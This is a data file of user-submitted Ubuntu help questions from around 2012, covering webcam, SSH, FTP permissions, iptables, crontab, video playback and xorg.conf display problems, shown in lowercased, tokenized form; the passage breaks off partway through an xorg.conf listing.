117302	flash webcam non responsive	i 've got the same problem as this gentleman : https : //answers.launchpad.net/ubuntu/+source/flashplugin-nonfree/+question/176541 where the webcam settings / access does not work at all / is completely unresponsive in ubuntu 11.10 . i 've tried webcam access in facebook , google+ , my own code + a number of tutorials/demos and none work . what happens is the settings dialogue is completely unresponsive . clicking tabs or buttons does nothing . in the question linked to a suggested answer is to run unity 2d . unfortunately this does not work for me ( the exact same thing happens ) . i 've also tried gnome 3 which also does not work . note that it is only the webcam settings that do n't work . youtube videos and annoying banners work just fine . does anyone know of a workaround for this ( except going back to 11.04 ) or if they 've fixed this in 12.04 ? - also , are any of you experiencing the same thing ?
117303	printing document on windows7 from printer which is connected to ubuntu ( via rdp on ubuntu )	i have a printer on ubuntu . i want to print a document on windows7 via rdp on ubuntu . 覺 want to connect windows7 via rdp on ubuntu . 覺 will choose a document there . the document will be printed from my printer which connects on ubuntu . how can i solve this problem ? thanks for help !
117306	set usergroup and persmissions ftp folder back to default	i tried to create a new ftp user via the commandline . i did something wrong and now i can access the server via ftp but i ca n't see any files . it does n't make any sense wich user i 'm using . ls -la drwxr-xr-x 13 root ftp 4096 2012-03-30 09:47 . drwxr-xr-x 7 web6 ftp 4096 2012-03-26 09:28 .. drwxr-xr-x 4 web6 ftp 4096 2012-03-26 13:31 actions drwxr-xr-x 2 web6 ftp 4096 2012-03-26 11:46 bin -rwxr-xr-x 1 web6 ftp 1520 2012-03-24 23:32 changelog.txt drwxr-xr-x 2 web6 ftp 4096 2012-03-26 13:30 css drwxr-xr-x 8 web6 ftp 4096 2012-03-24 22:43 external -rwxr-xr-x 1 web6 ftp 333 2012-03-26 15:12 .htaccess drwxr-xr-x 3 web6 ftp 4096 2012-02-27 15:07 images -rwxr-xr-x 1 web6 ftp 1606 2012-03-26 21:25 index.php drwxr-xr-x 2 web6 ftp 4096 2012-02-18 13:20 js drwxr-xr-x 2 web6 ftp 4096 2012-02-03 00:34 layout drwxr-xr-x 2 web6 ftp 4096 2012-03-29 23:35 library drwxr-xr-x 2 web6 ftp 4096 2012-03-30 09:47 log -rwxr-xr-x 1 web6 ftp 396 2012-03-24 15:04 menu.php drwxr-xr-x 2 web6 ftp 4096 2012-03-30 12:01 python drwxr-xr-x 2 web6 ftp 4096 2012-03-23 10:51 todo i ca n't see no dirs and files because i changed the groupowner or i changed the rights of the groupowner of the ftp dir . how can i set the ownership of the files back to default so i can access the files via ftp again ?
117307	access gnome-shell messaging tray using keyboard	is there a keyboard shortcut to access the gnome-shell messaging tray ? e.g . for responding to incoming im , etc .
117309	how can i install any package in a particular directory with apt-get ?	i would like to know if there is any way that i can make apt-get to install packages in a directory other than /usr/bin . say i want apt-get to install all the packages from now on to /software . its this possible in anyway ? i want something to work like -- prefix option that we use while compiling source . thanks
117312	system slow after uprading ubuntu	i have an ubuntu network machine which has release of 10.04.1 lts lucid . on this system i have apache , postgresql and django . for some app . development i have to install php and php-curl ... due to being on network , i have exported wmvare machine to internet and firstly i have upgraded system and then install php5 packages on it . after all replacing it with its old place , i have considered that the new system query is some slow according to another . old system query time : 140 ms new system query time : 9.11 s i have checked /etc/network interface and it seems there is no problem . i have checked /etc/resolv.conf and it seems ok i have checked /etc/nsswitch.conf and only host section is different from old one which old system has hosts : files mdns4_minimal [ notfound=return ] dns mdns4 and then i have checked time host -t a services.myapp.com and i got real 0m0.355s user 0m0.010s sys 0m0.020s and i have checked apache2 hostnamelookups : find /etc/apache2/ -type f | xargs grep -i hostnamelookups it returned : /etc/apache2/apache2.conf : # hostnamelookups : log the names of clients or just their ip addresses /etc/apache2/apache2.conf : hostnamelookups off and now what can i have to check for boosting my system as before ?
117316	sudo not asking for password of correct user	i have a new installation of 11.10 . i have an admin user , and a standard user that does n't have password with autologin . if i log in as the standard user , when i use sudo from command line , it asks for that users password , which does n't work because that user has no password , and is n't admin . if i log in as admin user , it asks for admins password . how do i make sudo always ask for admin password ? thanks , cp
117322	how to schedule a dvb-t stream record for vlc ?	i can watch tv with vlc ( dvb-t ) . timeshift and record functions work fine . what could i do to schedule a stream record ? i. e. , zdf today at 22:25 for 45 minutes . this is my channels.conf : das erste:618000000 : inversion_auto : bandwidth_8_mhz : fec_2_3 : fec_auto : qam_64 : transmission_mode_8k : guard_interval_1_4 : hierarchy_none:1537:1538:96 zdf:594000000 : inversion_auto : bandwidth_8_mhz : fec_2_3 : fec_auto : qam_16 : transmission_mode_8k : guard_interval_1_4 : hierarchy_none:545:546:514 3sat:594000000 : inversion_auto : bandwidth_8_mhz : fec_2_3 : fec_auto : qam_16 : transmission_mode_8k : guard_interval_1_4 : hierarchy_none:561:562:515 arte:618000000 : inversion_auto : bandwidth_8_mhz : fec_2_3 : fec_auto : qam_64 : transmission_mode_8k : guard_interval_1_4 : hierarchy_none:33:34:2 mdr sachsen:538000000 : inversion_auto : bandwidth_8_mhz : fec_2_3 : fec_auto : qam_64 : transmission_mode_8k : guard_interval_1_4 : hierarchy_none:1553:1554:97 rbb brandenburg:538000000 : inversion_auto : bandwidth_8_mhz : fec_2_3 : fec_auto : qam_64 : transmission_mode_8k : guard_interval_1_4 : hierarchy_none:2833:2834:177 bayerisches fs nord:538000000 : inversion_auto : bandwidth_8_mhz : fec_2_3 : fec_auto : qam_64 : transmission_mode_8k : guard_interval_1_4 : hierarchy_none:529:530:33 wdr kรถln:538000000 : inversion_auto : bandwidth_8_mhz : fec_2_3 : fec_auto : qam_64 : transmission_mode_8k : guard_interval_1_4 : hierarchy_none:4193:4194:262 einsfestival:618000000 : inversion_auto : bandwidth_8_mhz : fec_2_3 : fec_auto : qam_64 : transmission_mode_8k : guard_interval_1_4 : hierarchy_none:81:82:5 neo/kika:594000000 : inversion_auto : bandwidth_8_mhz : fec_2_3 : fec_auto : qam_16 : transmission_mode_8k : guard_interval_1_4 : hierarchy_none:593:594:517 zdfinfo:594000000 : inversion_auto : bandwidth_8_mhz : fec_2_3 : fec_auto : qam_16 : transmission_mode_8k : guard_interval_1_4 : hierarchy_none:577:578:516 phoenix:618000000 : inversion_auto : bandwidth_8_mhz : fec_2_3 : fec_auto : qam_64 : transmission_mode_8k : guard_interval_1_4 : hierarchy_none:49:50:3 i use vlc 2.0.1 .
117324	terminal command to control the standard music/video player ( play/stop/next.. )	after googling for a while now im unable ( -.- ) to find a solution for this : i want to tell my standard ( as noted in settings ) music/video player to play/stop/next via terminal . but with a global command and not `` /usr/bin/banshee -- next '' for example . here is what i found till now : x86audionext ( keyboard keys ) , xmodmap ( organisation of keyboard keys ) .
117325	how do i get mt-daapd ?	i read other people 's blog showing as easily as sudo apt-get install mt-daapd . but when i do that , i got an error message e : unable to locate package mt-daapd . could someone point me to the right direction ?
117327	distorted colors on youtube after an upgrade	i have kubuntu 11.10 , and after last upgrade , i 'm not really sure what was it , but i assume chrome from 17 stable to 18 stable , flash plugin , youtube started showing distorted colors ( in chrome and firefox ) . here is an example : video files from disk run fine . also if different browser player is used ( from some other site for example ) the colors are good , but on youtube i have a problem . i have nvidia card with nvidia proprietary drivers if that makes and difference . edit : some videos on youtube play with correct colors , it seems it has something to do with codecs .
117333	unable to ssh out anywhere - ssh_exchange_identification	i have a setup where i 'm running ubuntu 11.10 as a virtualbox guest under a windows 7 host , behind a restrictive corporate firewall . i have set up nat from the host port 22 to ubuntu 's port 22 ; it inform me that they have opened port 22 outbound for the host machine 's ip address . i have run ssh-keygen -t rsa , and am trying to test the setup by connecting to github and another known ssh server . in both cases the connect is refused with ssh_exchange_identification : connection closed by remote host . full -vvv log is below . is this possibly still due to the corporate firewall ? if so , what else might i need to request from them ? any other ideas what might be wrong and how to fix it ? ~ $ ssh -tvvv git @ github.com openssh_5.8p1 debian-7ubuntu1 , openssl 1.0.0e 6 sep 2011 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to github.com [ 207.97.227.239 ] port 22. debug1 : connection established . debug3 : incorrect rsa1 identifier debug3 : could not load `` /home/chris/.ssh/id_rsa '' as a rsa1 public key debug2 : key_type_from_name : unknown key type ' -- -- -begin' debug3 : key_read : missing keytype debug2 : key_type_from_name : unknown key type 'proc-type : ' debug3 : key_read : missing keytype debug2 : key_type_from_name : unknown key type 'dek-info : ' debug3 : key_read : missing keytype debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug3 : key_read : missing whitespace debug2 : key_type_from_name : unknown key type ' -- -- -end' debug3 : key_read : missing keytype debug1 : identity file /home/chris/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/chris/.ssh/id_rsa-cert type -1 debug1 : identity file /home/chris/.ssh/id_dsa type -1 debug1 : identity file /home/chris/.ssh/id_dsa-cert type -1 debug1 : identity file /home/chris/.ssh/id_ecdsa type -1 debug1 : identity file /home/chris/.ssh/id_ecdsa-cert type -1 ssh_exchange_identification : connection closed by remote host edit : requested diagnostics : ~ $ ls -la ~/.ssh total 16 drwx -- -- -- 2 chris chris 4096 2012-03-30 13:12 . drwxr-xr-x 29 chris chris 4096 2012-03-30 13:25 .. -rw -- -- -- - 1 chris chris 1766 2012-03-30 13:12 id_rsa -rw-r -- r -- 1 chris chris 409 2012-03-30 13:12 id_rsa.pub
117338	libboost installation per apt-get - where are the files located ? how do i link them in eclipse ?	im trying to install the boost libraries and entered sudo apt-get libboost* i managed to set the include paths and the header-only librarys are working . when i try other libraries like regex i get an `` reference not found '' error where do i set the paths for the linker and what path do i need to set ? ( cant find the files on my file system )
117341	how can i find *.desktop files ?	to the best of my knowledge , all shortcuts in the unity launcher have a corresponding *.desktop file . i have one shortcut ( for skrooge ) that does n't have an icon . how can i find the *.desktop file corresponding to this shortcut so that i can add an icon to it ?
117350	how to move all the indicators from buttom panel to top panel in gnome 3.2.0 ?	i want to work with gnome 3.x instead of unity 3d , i find it more comfortable but the only thing missing for me it 's all of the indicators which now located at the buttom panel in contrast to unity which locate them in the top panel . how can i move them to the top panel ?
117357	adobe flash not working	i had a problem with flash not loading on a particular website so i uninstalled it on the software centre and reinstalled it ok. chrome indicates that the plugin is resident ( shockwave flash 11.2.r202 ) but flash is not working when i check the adobe site http : //helpx.adobe.com/flash-player/kb/find-version-flash-player.html . can anyone help ?
117359	how do i change the timezone to utc ?	i just installed a ubuntu 11.10 box and i 'm trying to figure out how to set the timezone to utc . i have it set to london at the moment , but utc does n't appear to be an option . help ?
117360	android client ca n't access shared files from another account ?	i have an account shared with me . can see it on web , on linux and windows workstations , etc. , but can not see it on the android client . bug ? or on purpose ? or am i doing something wrong ? thanks . mike .
117366	what causes file managers to show drives ?	what forces a file manager to show unmounted partitions in the left pane ? that is - what process is it that causes filemanagers to show drives - it 's not fstab - i can show that here , i know that inserting a mountable volume makes it show . i 'm trying to understand what it is that actually gives the filemanager the signal to show the partition in the first place .
117367	why wo n't windows remember their size in lubuntu ?	if i close a window , i expect it to remember the size it was , and reopen the same size next time . on lubuntu , this is n't happening . i close a window , and the next time i open that app , the window might be small , big , or as big as the screen , but not maximized . is this a linux thing ? is it the window manager , or the app ?
117370	ampersand changing into a question mark in terminal	i run a server through terminal , and whenever a command with an ' & ' in it pops up , terminal sees it as a question mark . and when i try to save a configuration with an & in it it will eventually turn into a question mark as well . any help with this annoying issue would be appreciated . edit : i am on ubuntu 11.04 btw .
117373	how to boot to recovery mode in 10.04 ? holding shift key does n't work	i am going to try the guide inside this question however , it requires me to boot from recovery mode . but holding the shift key does n't work for me to go to grub menu . anyone know how to troubleshoot this kind of behavior ? kit
117377	how can i rescue a lubuntu install ?	quick recap : i was having a problem with hibernation so i check and the linuxswap partition is missing , showing an `` unknown '' chunk of drive where it was . happened before , booted to the livecd and used gparted to reformat that partition back to swap . then i boot ... ... ..f -- -- grub rescue ... mbr took care of the problem , except that now i 'm back to windows only . every guide out there makes me reinstall lubuntu from scratch , a waste of time considering it will take me at least a day to reinstall everything there . ca n't i just fix grub like i did with the win mbr ?
117384	ubuntu nic card issue	i am trying to install nic r8168 and it shows everything installed ok . it is a brand new nic and the lights wont come on when i plug in a ethernet . the nic is that is not working is eth0 . why does it show the r8168 driver being used by 0 ? my nic model number is st1000spex if anyone is wondering . lsmod module size used by r8168 215669 0 ifconfig eth0 link encap : ethernet hwaddr 00:0a : cd:1e:0a:4a up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:43 base address:0x2000 eth1 link encap : ethernet hwaddr 00:19 : d1:1d : f6:7a inet addr:192.168.1.83 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :219 : d1ff : fe1d : f67a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:551467 errors:0 dropped:0 overruns:0 frame:0 tx packets:145219 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:409744342 ( 409.7 mb ) tx bytes:12233173 ( 12.2 mb ) interrupt:21 memory : dfde0000-dfe00000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:280 errors:0 dropped:0 overruns:0 frame:0 tx packets:280 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:22608 ( 22.6 kb ) tx bytes:22608 ( 22.6 kb ) ubuntu 11.10 x64 kernel 3.0.0-12-generic
117385	uec - unable to ssh into instance , asks for password	i am attempting to set up a private cloud using ubuntu 10.04.4 server . i am following the tutorial at http : //cssoss.wordpress.com/2010/11/26/eucabook-v1-1/ . all steps go on perfectly apart from that i am unable to ssh into the running instances . i have created the instance using a public key and try to ssh into instance using the private key . however it asks for password . i am able to ping the instance though . i have tried using both the pre-built images from the store as well as custom built images . several people seem to have the same problem but there does not seem to be any working solution . thanks in advance .
117389	how can i set up url caching in ubuntu ?	i 'd like to set up linux to cache some commonly requested urls so that it does n't have to go out to the net to get them every time . this would be a system-wide url cache , not just in a particular browser . for example , a program might request http : //www.w3.org/tr/html4/sgml/loosedtd.html a few thousand times per day . there are many other urls i 'd like to cache as well . is there an app for that ?
117400	ubuntu no longer recognises hdd partition as writable but windows does ?	i dual-boot between windows and ubuntu , such that i have a partition on my hdd for the respective system files for each operating system and another partition for my documents . i renamed the system partitions using the gparted app , but now ubuntu wo n't recognise the documents partition as read/write , only as read-only . windows can still write to it though . any pointers as to how to sort this out ?
117403	clean history script not working	i 'm creating a script to run in the start up that says : _cleanthehistory ( ) { /bin/echo `` cleaning the history '' history -c } _cleanthehistory the deal here is that this does not work from the script , but if i run it from the command line works . any ideas ? thanks in advance . pablo .
117414	how to share wireless in xubuntu	just wondering . how do i share an ethernet connection through wireless in xubuntu . in windows i could use intel mywifi technology but i 'm not sure about linx 's software
117416	upgrade from linux mint 12 to kubuntu 12.04 ?	is there an `` easy '' way to `` upgrade '' my existing linux mint 12 install to kubuntu 12.04 beta 2 ? i know i could reinstall . usually i would do a clean install to avoid unexpected issues . but in this case , i do n't have time to reconfigure everything from my printers to my installed software , so i am looking for the quick/easy way , but i also want to avoid big risks of an upgrade gone wrong . i 'm hoping to just change some repos and run a few commands from the terminal . i do n't mind editing a few config files as long as i can find good howtos . but i do n't want to be the pioneer ( arrows in back ) . i 'm hoping someone has done this before and has a set of steps . for context , i recently installed kde 4.8 sc onto kubuntu 11.10 using ppas . this was on another computer . that was n't a problem . but i decided to do a fresh install of kubuntu 12.04 later . i like it well enough that i want to change my other computer from linux mint 12 to kubuntu . ( i 'm going all-in with kde . it 's now my desktop of choice . ) this linux mint upgrade will be a move from gnome and mgse to kde , so that will probably complicate things at bit compared to something like upgrading kubuntu 11.10 to kde 4.8 . references : http : //www.psychocats.net/ubuntu/kde is it safe to install kubuntu-desktop in 11.10 ?
117422	what is the release schedule for the ubuntu branches ?	the different branches ( xubuntu for example ) : are they released the same day as the main branch ? ie will xubuntu 12.04 come out the same day as ubuntu 12.04 , or is there a lag ? is there an official policy posted somewhere ?
117427	recurring changing owership problem on external hdd	i 've had this problem before and now it 's struck me again and with full force ! here are the details of my hard drive : 1 tb , hfs+ type partition mounted at /dev/sdb2 does n't have write access for some reason ( i tried copying files to it and it would n't take ) chown my-user-name /media/hdd-name/* did n't work this was not required as journaling was already turned off . this has never worked . what gives ? what should i do ? edit 1 in /media when i run ls -l , this is what shows up for attributes for my external hdd : drwxrwxrwx 1 99 99 24 2012-02-24 12:42 untitled 1 where untitled 1 is the ( clever ) name for my external hdd ... who is the `` 99 '' bloke ? : p any thoughts ? solution ! ! ! yippeee ! ! ! chown -rf dnaneet : dnaneet /path/to/folder/ please do leave any comments , thoughts/feedbacks pertinent to this solution ... i am reading this right now to get better informed about sharing data between os 's ...
117432	ugly application gui when logged in as root	when logging in as root all windows look very basic , much like windows 98 , when using custom themes . themes in the home/.theme folder are ignored and the root defaults back to a basic theme . ubuntu 11.10 + ubuntu 12.04 this effects synaptic package manager , as well as nautilus . seems to effect when logged on to any app as root ... http : //farm3.static.flickr.com/2481/3894493076_4b3c63c9f0.jpg thanks
117441	how to make openjdk automatically update-alternatives ?	well , i 've made a fresh ubuntu 11.10 install and i installed openjdk 7 . it updated alternatives just after installing , so it was all good . then , i compiled a source and executed it and it did n't worked , then i noticed that java was using the version 1.6 , while the javac was 1.7 . i thought i had installed it wrong , so i uninstalled it and installed it again . but now , it does not update alternatives automatically ( it does it only for javaws ) . is there a way to `` restart '' it so the apt-get does the update-alternatives by itself like the first time ? is it normal that it uses the java 1.6 instead of the java 1.7 when installing openjdk 7 ? thank you very much !
117444	installing wireless printer	i 've been trying to install my lexmark platnum pro 905 printer to my laptop with ubuntu , and every time i try , it asks for the administrator password . what could that be , since i 've tried my normal password to sign in , and that does not work ? any idea 's on what an administrator password is or where i can find it ? .
117451	iptables not blocking user	iptables seems to not want to block a user . i 'm using a remastered 10.04 live and firestarter as a firewall . i 've made no fundamental changes to the distro , except to update , upgrade and added this iptable line for my admin user dev : sudo iptables -a output -p all -m owner -- uid-owner dev -j drop i 've allowed dev , my admin , to use firefox as another user : gksudo -u browseruser /usr/bin/firefox note : the purpose of this is stop opening up browser scripts to the admin account , and instead use a clean account with no privs as a proxy . now , i test to see if iptables is blocking in case admin accidentally tried to connect without using another user . so i try midori browser directly : /usr/bin/midori midori launches , and connects to the internet . i 'm puzzled . my iptables entry does n't seem to work . i added the same line i remastered with : sudo iptables -a output -p all -m owner -- uid-owner dev -j drop i still am not blocked . so , i try reseting the tables : sudo /etc/init.d/networking restart i get output : * reconfiguring network interfaces ... ignoring unknown interface wlan0=wlan0 . i try connecting again with midori browser , and my iptable rule is still ignored . what 's happening ?
117452	how do you add `` open in terminal '' to the right-click mouse menu for folders/directories ?	i would like to add it to the default menu ( mouse right-click ) like i want to right click on a folder and open it in the terminal . i do n't want to have to find the directory in the terminal .
117453	crontab -e gives me error messages	i get a bunch of error messages when i run crontab -e here are the error messages . and here is my crontab file under `/usr/bin/ ' : # /etc/crontab : system-wide crontab # unlike any other crontab you do n't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d . these files also have username fields , # that none of the other crontabs do . shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin # m h dom mon dow user command 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly ) 30 * * * * root rsync /home/dnaneet/downloads/*.pdf /home/dnaneet/downloads/pdfs/ # i notice that the last task ( 'rsync ' ) never runs ! why is this happening ? what did i do wrong ? running ubuntu 11.10/bash . i have read this ... am i missing a shebang ? and i do n't know if my anacron jobs run . edit 1 in light of masi 's comment , i commented out lines 17 thru 25 of my crontab file with # . now when i run sudo crontab -e , all i get is : /usr/bin/crontab : 11 : 17 : not found /usr/bin/crontab : 12 : 25 : not found ( gedit:4301 ) : gtk-warning ** : attempting to store changes into `/root/.local/share/recently-used.xbel ' , but failed : failed to create file '/root/.local/share/recently-used.xbel.gohvbw ' : no such file or directory ( gedit:4301 ) : gtk-warning ** : attempting to set the permissions of `/root/.local/share/recently-used.xbel ' , but failed : no such file or directory what in the world ?
117458	application to automatically search lyrics and store them in id3-tags	i 'm looking for an application that automatically searches lyrics on the internet and stores them in id3-tags . such a program , called iart , already exists for microsoft windows . does a similar application exist for ubuntu as well ?
117459	video files from another partition or volume does not play	some video files from another partition or volume does not display in some video displays but display on another and crashes on others . seem to play on these video players : vlc smplayer gnome-mplayer seem to have some issues in these video players : totem -some videos are play while others not banshee -some videos are play while others not bangarang -few videos are play while others not and it crashes and happens also in home folder of filesystem dragon player -crashes and seem not to display any video and happens also in home folder of filesystem why this happens ? is this a bug ? this error occurs on ubuntu 12.04 beta 2 . on ubuntu 11.10 , every video display play all the video from another partition or from home filesystem .
117465	coolbits not working	i want to use coolbits to increase fan speed of my fermi gpu . 280.13 driver installed . ubuntu 11.10 i edited /etc/x11/xorg.conf as follows , by pressing alt+f2 and gksu gedit /etc/x11/xorg.conf i get section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 470 '' option `` nologo '' `` true '' option `` coolbits '' `` 4 '' endsection started getting these messages , gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' so i did this , sudo aptitude install gtk2-engines-pixbuf terminal , a @ z : ~ $ nvidia-settings -a [ gpu:0 ] /gpufancontrolstate=1 a @ z : ~ $ nvidia-settings -q fans 1 fan on z:0 [ 0 ] z:0 [ fan:0 ] ( fan 0 ) a @ z : ~ $ nvidia-settings -a [ fan:0 ] /gpucurrentfanspeed=80 error : error assigning value 80 to attribute 'gpucurrentfanspeed ' ( z:0 [ fan:0 ] ) as specified in assignment ' [ fan:0 ] /gpucurrentfanspeed=80 ' ( unknown error ) . so , it 's not working ; i ca n't enter the fan speed percentage . also from nvidia x server , there are no fan controls . http : //en.gentoo-wiki.com/wiki/nvidia # manual_fan_control_for_nvidia_settings
117468	krunner unreadable black text on black background . file a bug ? where ?	i 'm running kubuntu 12.04 beta2 ( up to date ) . already tried to create a user from the scratch but the problem can still be replicated . i 'll make it simple : with any of the available themes ( air , air 4 netbooks , oxygen ) whenever i disable desktop effects , krunner instantly becomes black ( with black fonts ) rendering itself useless because of its unreadable text . here is a screenshot i took : the weird thing is that with effects enabled krunner is `` light gray '' and perfectly functional . what can i do ? should i file a bug ? if yes : where ? on the kde bug tracker or the kubuntu one ? thanks in advance !
117476	maximize terminal or save last state ?	i have a question about the gnome-terminal . if i open firefox or my file explorer , if i close it while maximized , the next time i open it it 's also maximized , but i ca n't do this with the terminal . do you know any way to make it save the state ? thanks !
117484	microsoft visual c++ 2010 redistributable package ( x86 )	i 've had this problem numerous times when trying to install software in wine , now i 've come to the point where i have to install something in wine . installing the program works fine , as soon as i go to run it however i get the message microsoft visual c++ runtime . runtime error i have installed the above package using wine tricks , but still nothing . have goggled to try and find if i am missing dependencies or anything obvious , but after that i am stuck . cheers
117487	using ubuntu 's `` screen '' command to share screens	i have two machines . i ssh 'd into one . i want whatever i type on one to display on the screen of the other . i know you can do this with the gnu screen command . how ? thanks !
117494	what do i install to start programming in java ?	i have an ubuntu 11.10 with eclipse installed , now i am supposed to need jvm , java compiler and something called api . i am starting to learn java , because it is easy to make it work on windows after . so what do i install ?
117495	ffmpeg not extracting part of the video	i used ffmpeg to extract portion ( 5 seconds ) of a video like this : ffmpeg -ss 00:30:00 -t 00:00:05 -i original.avi cut1.avi and also like this : ffmpeg -ss 1800 -t 5 -i original.avi cut1.avi but what ffmpeg did was create a file starting at 00:30:00 and included the rest of the file instead of just 5 seconds . so instead of having a 5 second video clip , i now have the whole file except the first 30 minutes . what went wrong ? i tried this with mencoder as well -- same result . edit 1 strangely , this worked on os x ... . edit 2 after rebooting ubuntu , i found that ffmpeg worked fine . what process was turned off that did this though ?
117496	how do i get an intel cs630 webcam working ?	i currently own a cs630 intel r pc camera and can not for the life of me find anyone who would help me install it . can you please help me ?
117497	will 12.04 have a keyboard backlight indicator ?	i have a laptop which has a keyboard with a backlight . this works fine , brightness indicator , volume indicator , but nothing appears on for keyboard backlight . will 12.04 eventually have a keyboard backlight indicator ? or i will be 5 years without one ? .
117498	how do i install the latest version of emacs and pick the appropriate ui ?	i 'm running the latest kubuntu ( 12.04 beta 2 ) and i would like to run the latest emacs ( currently v24 ) . the repos are one version behind . what 's the best way to install v24 or later ( and avoid future version conflicts ) ? also , is there any reason not to aways use the gui version of emacs if x is running ? for example , could i set the gui emacs version as the default text editor and use it to edit cron jobs ( crontab -e ) ? i 'm assuming the answer is yes , but since i have n't done that yet ( my default editor is nano ) , i want to check if there are reasons i should leave nano as the default editor . usually when i 'm working on the command line i end up using nano . now that i think about it , i have no idea why i keep doing that . is there any downside to calling a gui editor when working in an x terminal ? edit : i briefly tested these two versions gnu emacs 24.0.94.1 ( x86_64-pc-linux-gnu , gtk+ version 3.3.20 ) from gnu emacs 23.3.1 ( x86_64-pc-linux-gnu ) installed by default in kubuntu . this post explains some of the differences between versions . unfortunately ( for me ) the defaults installed version ( 23.3.1 , 23.3+1-1ubuntu9 ) is the nox version . package : emacs23-nox status : install ok installed version : 23.3+1-1ubuntu9 replaces : emacs23 , emacs23-gtk , emacs23-lucid the package with version 24 opens in gui mode by default . that 's what i prefer . some of the version 24 changes that interest me are listed in the references below . but there appear to be a multitude of different packages and versions i could install . references : whatâs new in emacs 24 ( part 1 ) | mastering emacs http : //www.masteringemacs.org/articles/2011/12/06/what-is-new-in-emacs-24-part-1/ '' shell-mode uses pcomplete rules , with the standard completion ui . yowzah ! thereâs a lot of cool , new functionality hidden away in this gem of a change . '' emacswiki : recent changes http : //www.emacswiki.org/emacs/ ? action=rc ; showedit=0
117503	onieric boot problems	new to ubuntu , i 've used 11.04 sucessfully for 10 months . just upgraded , 11.10 is booting directly into gnu grub menu . the only way i can get her going is to select previous versions options , which does n't make sense because 11.04 is the only previous version and it 's not even an option . all other options result in the blinky curser screen . once in through previous versions all seems fine . what 's up with that and how do i fix it ? i googleshooted it and found little . i did attept to hold shift to get into recovery mode , but was text only . i also ran boot repair and was given `` http : //paste.ubuntu.com/908073/ '' to indicate if there was no change , which there was n't . thank you in advance .
117505	is it possible to login by voice recognition ?	although i like face recognition , i 'd prefer to use voice recognition login . is it possible ? if it 's possible how do i setup the software ?
117507	how to transfer music from zip archive to banshee	whenever i open a 2gb zip file using banshee , it plays fine until i close the archive , at which point it ceases to play . why wo n't it play the songs when the archive is closed , just like it does for every zip or rar album i have in my `` downloads '' folder ?
117510	install lubuntu 12.04 on an old dell c600 : video issues	i am trying to install lubuntu on an old laptop . i use the 386 alternate instalation of it , because it has only 256mb ... all when ok so when i start up the lubuntu the screen splits between 1024x768 and 800x600 ... its very horrible to use = ) . ok i do this : lspci and found an ati rage mobility m3 . 01:00.0 vga compatible controller : ati technologies inc rage mobility m3 agp 2x ( rev 02 ) so i tryied the old xorg way to edit the missing resolution , but it does not work : ... section `` screen '' identifier `` default screen '' device `` ati technologies , inc . rage mobility m3 ( agp ) '' monitor `` generic monitor '' defaultdepth 24 subsection `` display '' depth 1 modes `` 1024x768 '' endsubsection subsection `` display '' depth 4 modes `` 1024x768 '' endsubsection subsection `` display '' depth 8 modes `` 1024x768 '' endsubsection subsection `` display '' depth 15 modes `` 1024x768 '' endsubsection subsection `` display '' depth 16 modes `` 1024x768 '' endsubsection subsection `` display '' depth 24 modes `` 1024x768 '' endsubsection endsection on an brand new xorg.conf ... do an init 6 to see if x take the changes , but nothing habbened : also tryed to do pkg-reconfigure -changedir /etc/x11 ( where i created the new xorg.conf ) and nothing.. removed the x conf from /tmp.. also do sudo apt-get update / upgrade ... and no luck ... update updated to 12.04 . this an edited xorg fr old dells like mine : # xorg.conf ( x.org x window system server configuration file ) # # this file was generated by dexconf , the debian x configuration tool , using # values from the debconf database . # # edit this file with caution , and see the xorg.conf manual page . # ( type `` man xorg.conf '' at the shell prompt . ) # # this file is automatically updated on xserver-xorg package upgrades *only* # if it has not been modified since the last upgrade of the xserver-xorg # package . # # if you have edited this file but would like it to be automatically updated # again , run the following command : # sudo dpkg-reconfigure -phigh xserver-xorg # xorg.conf for dell latitude c600 by a. howlett and others section `` serverlayout '' identifier `` default server layout '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' inputdevice `` generic mouse '' `` alwayscore '' endsection section `` files '' rgbpath `` /usr/x11r6/lib/x11/rgb '' fontpath `` /usr/share/fonts/local '' fontpath `` /usr/share/fonts/misc '' fontpath `` /usr/share/fonts/75dpi : unscaled '' fontpath `` /usr/share/fonts/100dpi 